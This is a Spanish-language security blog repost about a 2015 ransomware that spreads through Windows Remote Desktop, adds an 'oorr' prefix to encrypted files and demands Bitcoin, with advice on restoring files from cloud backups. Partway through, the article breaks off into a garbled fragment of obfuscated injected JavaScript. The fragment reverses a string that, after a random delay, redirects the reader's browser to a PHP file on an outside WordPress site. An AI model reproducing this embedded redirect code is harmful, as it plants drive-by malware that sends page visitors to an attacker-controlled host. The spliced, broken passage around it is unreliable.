Un nuevo malware del TIPO RANSOMWARE COMO EL CRYPTOLOCKER, infecta equipos utilizando la aplicación de escritorio remoto de Windows (A los ficheros cifrados les aplican prefijo oorr)
Expertos en seguridad han detectado un nuevo virus informático que se distribuye utilizando la línea de comandos o la aplicación de escritorio remoto de Windows. Se trata de un ransomware muy similar a los vistos hasta el momento, ya que cifra los archivos y posteriormente solicita el pago de una cantidad de dinero para recuperar el acceso a estos.
El auge de los foros es innegable y los ciberdelincuentes están haciendo uso de ellos, o mejor dicho, crean foros falsos de soporte técnico en los que se ofrece ayuda a distancia a través de esta aplicación nativa de los sistemas operativos de los de Redmond. De esta forma, los criminales se aprovechan posteriormente de los equipos de aquellos usuarios que han dejado la conexión abierta, utilizando la fuerza bruta para obtener la contraseña y así realizar la instalación del malware sin que el usuario sea consciente.
Las asociaciones de usuarios de Internet piden extremar las precauciones con este tipo de prácticas y aquellas que se ofrecen para solucionar los problemas vía telefónica.
Cuando realizan la instalación del virus lo primero que hace este una vez ha finalizado el proceso es crear un mapa de las unidades de disco y extraíbles que hay disponibles. De esta forma realiza el cifrado de las carpetas ubicadas en los discos duros y utiliza las unidades USB para replicarse y así alcanzar otros equipos.
Este malware posee un sistema similar a Cryptolocker
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio-remo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
Una vez ha realizado el cifrado de los archivos crea en el escritorio un fichero de texto en el que el usuario encontrará las instrucciones si quiere recuperar el acceso a los datos. En esta ocasión solicita el ingreso de 4 Bitcoins en un monedero y ofrece una dirección de correo de Gmail para contactar con los responsables una vez se haya realizado el pago.
Evidentemente no se recomienda esta vía para recuperar los archivos cifrados, ya que un alto porcentaje pierde el dinero y no obtiene la clave o la herramienta para realizar el descifrado, sin embargo, parece que existe una vía para recuperar los archivos.
Los servicios de almacenamiento en la nube pueden ser la salvación
Además de las copias de seguridad, expertos en software han aclarado que si las carpetas afectadas están sincronizadas con un servicio de almacenamiento en la nube (Google Drive o Dropbox, por ejemplo) el usuario podrá eliminar los archivos del equipo que poseen el prefijo oorr. y descargar los que se encuentran en la nube. Evidentemente en primer lugar se debe eliminar el virus para evitar que los archivos sean cifrado de nuevo, y todo parece indicar que cualquier herramienta de seguridad actualizada es capaz de detectar esta amenaza de forma correcta y proceder a su posterior eliminación de forma satisfactoria.
Ver información original al respecto en Fuente:
to-de-windows/#sthash.Y3yrOcuP.dpuf” target=”_blank”>http://www.redeszone.net/2015/10/23/un-nuevo-malware-infecta-equipos-utilizando-la-aplicacion-de-escritorio-remoto-de-windows/#sthash.Y3yrOcuP.dpuf
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.